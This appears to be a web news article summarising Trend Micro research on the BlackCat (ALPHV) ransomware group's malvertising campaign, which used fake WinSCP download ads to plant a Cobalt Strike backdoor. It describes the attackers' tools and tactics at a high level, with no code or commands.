Physical Address

304 North Cardinal St.
Dorchester Center, MA 02124

BlackCat Deploys Malvertising for Backdoor Access

The Black Cat ransom ware-as-a-service group is currently developing a cluster of threat activities by utilizing specific keywords on legitimate organization webpages to deploy malicious malware. Also known as ALPHV, BlackCat has embedded these pages with malware installers that infect unsuspecting visitors. Their Malvertising campaign involves directing individuals who click on the malicious advertisements to a counterfeit download page for WinSCP, a widely used open-source Windows application for file transfer between local computers and remote servers through various protocols. BlackCat Deploys Malvertising for Backdoor Access.

Malvertising refers to the practice of spreading malware through online advertising using SEO poisoning techniques. It typically involves hijacking selected keywords to display fraudulent ads on search engine result pages of Bing and Google, with the intention of redirecting unsuspecting users to dubious websites. An unidentified organization, along with researchers from Trend Micro, discovered unauthorized cyber activities performed by criminals within their network. The criminals used a cloned webpage of WinSCP, an open-source Windows application for file transfer, as well as SpyBoy, a tool that compromises the protection offered by security agents.

BlackCat Exploits Malvertising Techniques to Promote Backdoor Entry

According to BleepingComputer, the group aims to target system administrators, web administrators, and IT professionals to gain initial access to valuable corporate networks. Trend Micro researchers Lucas Silva, RonJay Caragay, Arianne Dela Cruz, and Gabriel Cardoso outlined their collaboration with a victim who had been compromised through this campaign in a research report dated June 30. BlackCat Deploys Malvertising for Backdoor Access.

BlackCat Deploys Malvertising for Backdoor Access

The objective is to deceive users searching for applications like WinSCP into downloading malware, specifically a backdoor containing a Cobalt Strike Beacon. This backdoor establishes a connection to a remote server for subsequent operations, while also utilizing legitimate tools like AdFind to facilitate network discovery. As stated in the Trend Micro report, “Malware distributors exploit the same functionality in a technique known as malvertising – hijacking keywords to display malicious ads that lure unsuspecting search engine users into downloading malware.”

Malvertising Campaign by BlackCat: Spreading Backdoor Access

The targeted users are primarily interested in using WinSCP due to its open-source nature and its ability to securely transfer files via SSH, manage files, and function as a WebDAV and Amazon S3 client. The research report provides details on the tools, techniques, and procedures (TTPs) deployed during the attack, including both legitimate and illegitimate tools, scripts, and commands. In another investigation, similar TTPs were identified, leading to a BlackCat infection.

The access granted by Cobalt Strike is further exploited to download various programs for reconnaissance, enumeration (PowerView), lateral movement (PsExec), antivirus software evasion (KillAV BAT), and exfiltration of customer data (PuTTY Secure Copy client). The attackers obtained high-level administrator privileges and attempted to establish persistence and backdoor access to the customer’s environment using remote management tools.

BlackCat Leveraging Malvertising for the Distribution of Backdoor Entry

The fraudulent advertisements were identified on Google and Bing search pages. Trend Micro, the first to discover the campaign, noted that searches for “WinSCP Download” on these platforms lead to the promotion of malicious ads above safe and legitimate results. In the initial case, the threat actor was successfully removed from the victim’s network, but not before they had gained and misused top-level administrator privileges, attempted to establish persistence, and implanted backdoor access to the network using remote management tools such as AnyDesk. The use of the Terminator defense evasion tool to tamper with security software through a Bring Your Own Vulnerable Driver (BYOVD) attack was also observed.

Gold Rate in Pakistan Today – 3 July 2023

Leave a Reply

Your email address will not be published. Required fields are marked *